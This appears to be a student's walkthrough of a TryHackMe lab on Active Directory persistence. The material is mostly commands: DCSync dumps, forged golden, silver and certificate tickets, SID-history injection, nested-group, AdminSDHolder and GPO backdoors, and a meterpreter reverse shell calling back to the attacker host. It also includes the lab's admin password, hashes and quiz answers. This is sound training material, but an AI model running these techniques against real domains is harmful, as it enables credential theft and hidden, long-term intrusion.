Persisting Active Directory - Medium
- Persistence through Credentials
- Persistence through Tickets
- Persistence through Certificates
- Persistence through SID History
- Persistence through Group Membership
- Persistence through ACLs
- Persistence through GPOs
Persistence through Credentials
-
We are given low-privileged creds and DA (Domain Administrator) creds "Administrator:tryhackmewouldnotguess1@" for domain 'ZA'.
-
In large organizations, there are multiple DCs (Domain Controllers) per domain; each DC runs a process called KCC (Knowledge Consistency Checker).
-
KCC generates a replication topology for the AD forest and automatically connects to other DCs via RPC (Remote Procedure Calls) to sync info.
-
This replication process is called DC synchronisation or DC Sync; this process can be initiated by DCs as well as accounts belonging to Domain Admins group.
-
For a DC Sync attack, we can access an account that has domain replication permissions in order to harvest creds from a DC.
-
We should attempt to persist through creds such as:
- Creds that have local admin rights on several machines
- Service accounts with delegation permissions
- Accounts used for privileged AD services
-
DCSync all:
#ssh into THMWRK1 using DA account
ssh za\\Administrator@thmwrk1.za.tryhackme.loc
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#load mimikatz
privilege::debug
#dcsync a single account, our low-priv user
lsadump::dcsync /domain:za.tryhackme.loc /user:grace.clarke
#dumps NTLM hash for our user, we can verify with password hash
log sv_dcdump.txt
#enable logging on mimikatz
lsadump::dcsync /domain:za.tryhackme.loc /all
#dumps hash for all users
exit
dir
#the log file has been saved
find /I "SAM Username" sv_dcdump.txt
#recover all usernames
find /I "Hash NTLM" sv_dcdump.txt
#recover all hashes
powershell -ep bypass
#launch powershell
#use Get-Content to read lines above and below match
Get-Content .\sv_dcdump.txt | Select-String -Pattern krbtgt -Co
ntext 10,10
1. What is the Mimikatz command to perform a DCSync for the username of test on the za.tryhackme.loc domain? - lsadump::dcsync /domain:za.tryhackme.loc /user:test
2. What is the NTLM hash associated with the krbtgt user? - 16f9af38fca3ada405386b3b57366082
Persistence through Tickets
-
Golden Tickets are forged TGTs and Silver Tickets are forged TGS tickets.
-
The scope for Silver Tickets is limited to whatever service is targeted on the specific server.
-
Golden Tickets can be defended against by Blue Team by rotating the KRBTGT password twice; Silver Tickets are less likely to be discovered and harder to defend against as passwords of every machine account need to be rotated.
#from the dcsync attack, we have NTLM hash of krbtgt
#we can get NTLM hash of THMSERVER1 machine account for Silver Ticket
#get DomainSID using AD-RSAT cmdlet
powershell -ep bypass
#we have the required info to forge tickets
exit
#exit powershell
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#in mimikatz, generate golden ticket
kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /s
id:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:
600 /renewmax:10080 /ptt
#/admin for user to be impersonated
#/id is 500 for default Administrator account RID
#/sid for domain we want to generate ticket for
#/endin shows ticket lifetime of 600 mins
#/ptt injects ticket directly into session, ready to use
#or generate a silver ticket
kerberos::golden /admin:StillNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /target:THMSERVER1.za.tryhackme.loc /rc4:<4c02d970f7b3da7f8ab6fa4dc77438f4 /service:cifs /ptt
#/target is for hostname of target server
#/rc4 is for NTLM hash of target machine account
#/service for service requested in TGS; CIFS allows file access
dir \\thmdc.za.tryhackme.loc\c$\
#to verify the golden ticket works
dir \\thmserver1.za.tryhackme.loc\c$\
#or to verify silver ticket
1. Which AD account's NTLM hash is used to sign Kerberos tickets? - krbtgt
2. What is the name of a ticket that impersonates a legitimate TGT? - Golden Ticket
3. What is the name of a ticket that impersonates a legitimate TGS? - Silver Ticker
4. What is the default lifetime (in years) of a golden ticket generated by Mimikatz? - 10
Persistence through Certificates
-
We need a valid certificate that can be used for Client Authentication, and in this way we can use the certificate to request a TGT regardless of password rotations; we can also use the private key of the root CA (Certificate Authority) certificate to generate our own certificates.
-
Private key of CA is stored on CA server; if the key is not protect through hardware-based methods such as HSM (Hardware Security Module), then it is protected by machine DPAPI (Data Protection API) - this means we can use tools like
mimikatz. -
Extract private key:
ssh za\\Administrator@thmwrk1.za.tryhackme.loc
mkdir sv
cd sv
#create directory for our user
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
#in mimikatz
crypto::certificates /systemstore:local_machine
#view certificates stored on DC
#some certs are set not to allow to export key
#patch memory in mimikatz
privilege::debug
crypto::capi
crypto::cng
#services patched
#export certs
crypto::certificates /systemstore:local_machine /export
exit
dir
#certs stored in both pfx and der format
#za-thmdc-ca.pfx cert is of interest
#cert encrypted with password 'mimikatz'
#we can copy this cert to attacker machine and low-priv user home directory
- Generate own certs:
#we have private key and root CA certificate
#ForgeCert tool can be used to forge CA certificate
#in ssh access to low priv machine
C:\Tools\ForgeCert\ForgeCert.exe --CaCertPath za-THMDC-CA.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@za.tryhackme.loc --NewCertPath fullAdmin.pfx --NewCertPassword Password123
#this generates new cert
#use rubeus to request a TGT using this cert to verify
C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:fullAdmin.pfx /password:Password123 /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.88.101
#we receive TGT
#use mimikatz to load TGT
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
kerberos::ptt administrator.kirbi
#loads TGT and authenticates to THMDC
exit
#verify it worked
dir \\THMDC.za.tryhackme.loc\c$\
1. What key is used to sign certificates to prove their authenticity? - private key
2. What application can we use to forge a certificate if we have the CA certificate and private key? - ForgeCert.exe
3. What is the Mimikatz command to pass a ticket from a file with the name of ticket.kirbi? - kerberos::ptt ticket.kirbi
Persistence through SID History
-
SIDs are used to track the security principal and the account's access when connecting to resources.
-
SID history is used to enable access for an account to effectively be cloned to another; usually employed during AD migration.
-
Forging SID history:
#get ssh session on THMDC using Administrator creds
#get powershell session
powershell -ep bypass
#verify low-priv user has no info in SID history
Get-ADUser grace.clarke -properties sidhistory,memberof
#blank SIDHistory
#get SID of Domain Admins group
#as this is the group to be added in our SID history
Get-ADGroup "Domain Admins"
#now we can use DSInternals tools to patch ntds.dit file
#this file is AD database where all info is stored
Stop-Service -Name ntds -force
#stop NTDS service before patching SID History
Add-ADDBSidHistory -SamAccountName grace.clarke -SidHistory S-1-5-21-3885271727-2693558621-2658995185-512 -DatabasePath C:\Windows\NTDS\ntds.dit
#include SID to add to SID History
Start-Service -Name ntds
#start the service again
#we can now ssh into THMWRK1 with low-priv creds
#and verify our Domain Admin privs
#in powershell
Get-ADUser grace.clarke -Properties sidhistory
#updated SIDHistory
dir \\thmdc.za.tryhackme.loc\c$
#can be accessed
1. What AD object attribute is normally used to specify SIDs from the object's previous domain to allow seamless migration to a new domain? - SIDHistory
2. What is the database file on the domain controller that stores all AD information? - ntds.dit
3. What is the PowerShell command to restart the ntds service after we injected our SID history values? - Start-Service -Name ntds
Persistence through Group Membership
-
Privileged groups such as Domain Admins or Enterprise Admins are not the best to use for persistence as they are monitored more closely; if we want to persist through Group Membership, we can choose other groups like:
- IT Support group; this can be used to gain privileges like force changing user passwords.
- Groups that provide local administrator rights.
- Groups with indirect privileges such as ownership over GPOs.
-
Group nesting feature is used to create a more organised structure in AD; however it can also reduce visibility of effective access.
-
Persistence through group nesting:
#in powershell session as Administrator
New-ADGroup -Path "OU=IT,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "sv Net Group 1" -SamAccountName "sv_nestgroup1" -DisplayName "sv Nest Group 1" -GroupScope Global -GroupCategory Security
#creates new base group to be hidden in People -> IT OU
New-ADGroup -Path "OU=SALES,OU=People,DC=ZA,DC=TRYHACKME,DC=LOC" -Name "sv Net Group 2" -SamAccountName "sv_nestgroup2" -DisplayName "sv Nest Group 2" -GroupScope Global -GroupCategory Security
#creates another group in People -> Sales OU
Add-ADGroupMember -Identity "sv_nestgroup2" -Members "sv_nestgroup1"
#and adds previous group as member
#we can create more subgroups in a similar way
#thus making deeper layers of nesting
#in the 5th layer, we have sv_nestgroup5
#this group is added to Domain Admins group
Add-ADGroupMember -Identity "Domain Admins" -Members "sv_nestgroup5"
Add-ADGroupMember -Identity "sv_nestgroup1" -Members "grace.clarke"
#adds low-priv user to first group
#so due to nesting, our low-priv user has domain admin privileges
#we can verify this by printing file system for thmdc
#check members of Domain Admins group
Get-ADGroupMember -Identity "Domain Admins"
#shows members Administrator and sv_nestgroup5
1. What is the term used to describe AD groups that are members of other AD groups? - Group nesting
2. What is the command to add a new member, thmtest, to the AD group, thmgroup? - Add-ADGroupMember -Identity "thmgroup" -Members "thmtest"
Persistence through ACLs
-
We can inject into AD group templates that generate default groups for persistence; if the blue team deletes membership, we will get membership again once the template refreshes.
-
A common template is the
AdminSDHoldercontainer - exists in every AD domain, and its ACL (Access Control List) is used as template to copy permissions to all protected groups. -
A process
SDProptakes the ACL of theAdminSDHoldercontainer and applies it to all protected groups every 60 minutes; we can write an ACE that will grant us full permissions on all protected groups.
#rdp into THMWRK1 using low-priv creds
#in command prompt
#use runas to inject administrator creds
runas /netonly /user:Administrator cmd.exe
#this opens another cmd.exe
#in new cmd.exe
mmc
#opns Microsoft Management Console
-
In MMC, we can make the following changes:
-
File > Add Snap-in > Active Directory Users and Groups
-
View > Advanced Features > Enable Advanced Features
-
In the added snap-in, navigate to domain za.tryhackme.loc > System > AdminSDHolder > right-click > Properties > Security
-
Add low-priv user by clicking Add > type low-priv username and click Check Names > OK > Allow on Full Control > Apply and OK
-
-
Now, after 60 minutes, the low-priv user will have full control over all Protected Groups; we can make this happen quicker:
#open powershell session
cd C:\Tools
Import-Module .\Invoke-ADSDPropagation.ps1
Invoke-ADSDPropagation
#SDProp is manually started using script
-
Now, we can review security permissions of a Protected Group like Domain Admins - our user has full control over the group.
-
However, we are not a member of the Domain Admins group; but we have full control over it so we can add our low-priv user as a member if needed.
1. What AD group's ACLs are used as a template for the ACLs of all Protected Groups? - AdminSDHolder
2. What AD service updates the ACLs of all Protected Groups to match that of the template? - SDProp
3. What ACL permission allows the user to perform any action on the AD object? - Full Control
Persistence through GPOs
-
Common GPO persistence techniques:
- Restricted Group Membership
- Logon Script Deployment
-
We can create a GPO that is linked to the Admins OU, which allows us to get a shell on a host every time one of them authenticates to a host.
#in attacker machine
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=persistad lport=4445 -f exe > sv_shell.exe
#create payload
#windows allows executing Batch or Powershell scripts through logon GPO
#create Batch script for exploit
echo "copy \\za.tryhackme.loc\sysvol\za.tryhackme.loc\scripts\sv_shell.exe C:\tmp\sv_shell.exe && timeout /t 20 && C:\tmp\sv_shell.exe" > sv_script.bat
#this script first copies the binary from SYSVOL directory to local machine
#then waits 20 seconds before executing binary
#use scp and Admin creds to copy both scripts to SYSVOL directory
scp sv_shell.exe za\\Administrator@thmdc.za.tryhackme.loc:C:/Windows/SYSVOL/sysvol/za.tryhackme.loc/scripts/
scp sv_script.bat za\\Administrator@thmdc.za.tryhackme.loc:C:/Windows/SYSVOL/sysvol/za.tryhackme.loc/scripts/
#setup listener
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST persistad; set LPORT 4445;exploit"
#now we can rdp into THMWRK1
#and inject Administrator creds into runas
#we can open MMC as Administrator now
-
In the MMC window, we have to make the following changes:
-
File > Add Snap-in > Group Policy Management > Add and OK
-
Right-click Admins OU > Create GPO linked with name "sv - persisting GPO" > right-click created policy and select Enforced
-
Right-click on our policy > Edit (opens Editor window) > under User Configuration > Policies > Windows Settings > scripts (Logon/Logoff) > Right-click Logon > Properties > select Scripts > Add and Browse to SYSVOL directory where our batch & binary files are stored
-
Select Batch file as script > Open and OK > click Apply and OK
-
-
Now, every time one of the administrators logs into any machine, we will get a callback.
-
We can make it tougher for the Blue Team by removing the ability for all Administrators to edit GPOs.
-
Additional persistence techniques:
1. What MMC snap-in can be used to manage GPOs? - Group Policy Management
2. What sub-GPO is used to grant users and groups access to local groups on the hosts that the GPO applies to? - Restricted Groups
3. What tab is used to modify the security permissions that users and groups have on the GPO? - Delegation